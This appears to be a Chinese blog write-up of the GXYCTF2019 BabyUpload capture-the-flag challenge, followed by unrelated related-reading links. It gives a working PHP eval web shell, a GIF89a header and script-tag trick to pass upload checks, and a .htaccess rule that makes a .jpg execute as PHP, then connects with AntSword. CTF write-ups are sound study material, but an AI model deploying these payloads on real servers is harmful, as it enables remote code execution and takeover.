-
[GXYCTF2019]BabyUpload(.htaccess)
evil.php
eval($_POST['evil'])?>- 1
后缀名进行了限制
抓包
将.php更改为.jpg
仍然上传失败
将Content-type更改为image/jpeg
检查了文件内容了
换一种写法GIF89a? <script language="php">eval($_POST['evil'])</script>- 1
上传成功,但是无法解析为php使用.htaccess或者.user.ini
.htaccess
<FilesMatch "evil.jpg"> SetHandler application/x-httpd-php </FilesMatch> 一定不要加文件头(有些绕过可能会用到,但是这样.htaccess就无法发挥作用了) GIF89a? <FilesMatch "evil.jpg"> SetHandler application/x-httpd-php </FilesMatch>- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
意思是如果文件中有一个evil.jpg的文件,他就会被解析为.php
antsword连接即可
http://15ccf58c-c29f-4373-9046-e65dd92d9e33.node4.buuoj.cn:81/upload/021c567e8444d1f468bc1986e178fe5d/evil.jpg -
相关阅读:
【机械】基于matlab模拟打桩机运动学仿真附matlab代码
(六)centos7案例实战——sonarQube安装及springboot项目集成sonarQube完成代码质量检查
uniapp 事件委托失败 获取不到dataset
mysql join语句优化实战
python练习题集锦之一
【JavaWeb】之Tomcat介绍、安装与使用
【Kotlin精简】第4章 函数
组件分享之后端组件——LDAP仓库docker-openlda
【Hack The Box】linux练习-- Tabby
计算机的存储系统
- 原文地址:https://blog.csdn.net/qq_55675216/article/details/126302772